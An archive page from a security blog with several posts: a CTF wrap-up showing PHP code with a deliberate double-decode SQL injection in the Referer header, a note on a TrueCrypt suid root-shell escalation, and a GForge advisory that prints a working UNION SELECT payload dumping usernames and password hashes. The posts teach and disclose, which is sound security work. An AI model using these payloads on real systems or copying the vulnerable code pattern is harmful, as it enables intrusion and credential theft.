Author Archives: Admin

SqliLab CTF, Wrap Up!

ctf_blog1

As you would have noticed from the noise on twitter and other channels, the 2nd public CTF was a major success. Over 3000 registrations, ~7K unique IPs, 7 GB of log (in 3 days) and heaps of fun. As with anything, we had some un-wanted visitors, who tried to take the CTF down with a DNS amplification DDoS attack. The Site’s performance was affected but nevertheless the CTF was active and we provided some extra time to make up for the down-time.

So, just to wrap-up. The CTF had 2 objectives. Those who obtained both the flags ended up on the leader-board. We will wait for the winners to publish their individual write-ups. In the mean-time, here is sneak up into the code/vulnerabilities.

Both the Flags were based on existing challenges in our SQli Lab. SQLi lab is an awesome place to learn and master SQL Injection. 4 databases, 27 challenges, 90 objectives and heaps of fun!

Okay, with marketing done, lets dive into the CTF. The 2 vulnerabilities on which CTF was based were:

1. Column Truncation
2. Double decode SQL Injection

The 2nd flag was particularly tricky to get and most people had difficulty getting it.

ctf_blog2

Here is some code from the application:

$comments=mysql_real_escape_string($_POST['message']);
$url=mysql_real_escape_string($_SERVER['HTTP_REFERER']);
$query = "Insert into temp values('".$comments."','".urldecode($url)."')";

The trick here is to identify the following:

1. The attack surface is not just the HTTP parameters but other headers (e.g.Referer).
2. Application is doing a urldecode on the header value after validation.

Thus, %27 (‘) gets escaped by mysql_real_escape_string() whereas %2527 doesn’t get escaped and urldecode converts it to %27 which triggers the vulnerability. Its actually common for apps to perform URLdecode on data coming from fields such as Referer. Both the vulnerabilities have affected popular applications like wordpress and we have these vulnerabilities in custom applications during our pentest.

We didn’t want people to run benchmark() and sleep() against the database, so we decided to blacklist it:

$patterns = array('sleep','benchmark');
$patterns_flattened = implode('|', $patterns);
if (preg_match('/'.$patterns_flattened .'/i',urldecode($url)))
{echo 'Attack detected';
die;
}

This made identifying the vulnerability a bit difficult. But the fact that you could see blacklisted functions gave participants a clue that this header could potentially be vulnerable. Further, you can get a feedback from the application depending on whether the SQL returned error or not.

$result = mysqli_query($dbConnection, $query);

if ($result) {

echo "Thanks!, we will be in touch...";

}
else
{
echo "Error Occured :(";
}

We will leave the CTF link live for another few days for people to have a go at it. We are not accepting any submissions now. Thanks all for playing!

Finally, if you are interested in the topic of Injection Flaws, you can register for our class at Black Hat Las Vegas 2014.

A full write-up on CTF can be found here

The Art of Exploiting Injection Flaws@Black hat Vegas 2013

Hello All,

The popular course on Injection Flaws will return to Las Vegas at Black hat 2013. The 2 days hands on course covers Injection flaws and ONLY injection flaws. We dont talk about XSS, CSRF, CRLF etc etc. I think, 2 days is not enough time to learn the entire web application security and thus I only focus on Injection Flaws.

I will be appearing on the famous podcast pauldotcom and giving a little insight on the course on April 25th 7PM ET.

A little write-up about this can be found here:

In short, the USP of course are:

Advanced/Insane SQLI
Examples where SQLI gets un-detected by commercial tools
Advanced XPATH Injection (including 2.0)
Advanced LDAP Injection
Advanced HQLI/ORM Injection
Advanced XXE Injection, including blind XXE

The course page can be found here

See you in Vegas!


Update: here is the video from my podcast at pauldotcom:



Video streaming by Ustream

Update: My interview at Dark reading which also gives an insight into the course can be found here

Truecrypt running as sudo

Recently, i was going through the following truecrypt page:
http://en.gentoo-wiki.com/wiki/TrueCrypt

What is interesting to note is the recommendation to add ‘truecrypt group’ in the sudo commands. As truecrypt needs to be run as root, I assume that people will be making this binary a suid as root too.

To me this does not look very secure. Unlike a nfs share, which is by default mounted with root squashing enabled, truecrypt volumes do not have any such thing. Thus if a box has set truecrypt binary as suid. one just needs to transfer an encrypted volume(containing a suid bash file) on this box, mount this volumne and just execute this suid binary. This should give him a root shell.

Thus it is important that truecrypt should not be run as suid. This may be already known to some, but hey, i found it interesting. :)

New Theme

NotSoSecure became slighlty more secure with the new WordPress update.
This update is highly recommended if your wordpress allows user registration.
Its amazing how many vulnerabilities have been identified in wordpress over the years and i wonder how many are yet to come.

Gforge SQL Injection

Original Advisory: http://www.portcullis-security.com/179.php 

The file /www/people/editprofile.php seems to be vulnerable to sql injection at multiple points.

The exploit is fairly easy, one post request returns all the usernames and hashes from the backend database.

The hashes can then be cracked using john-the-ripper.

Exploit:-

POST request to:/www/people/editprofile.php

skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+

from+users–%3d1&MultiDelete=Delete

works against postgres database :).

Refer to the paper for exploiting sql injections against postgres database.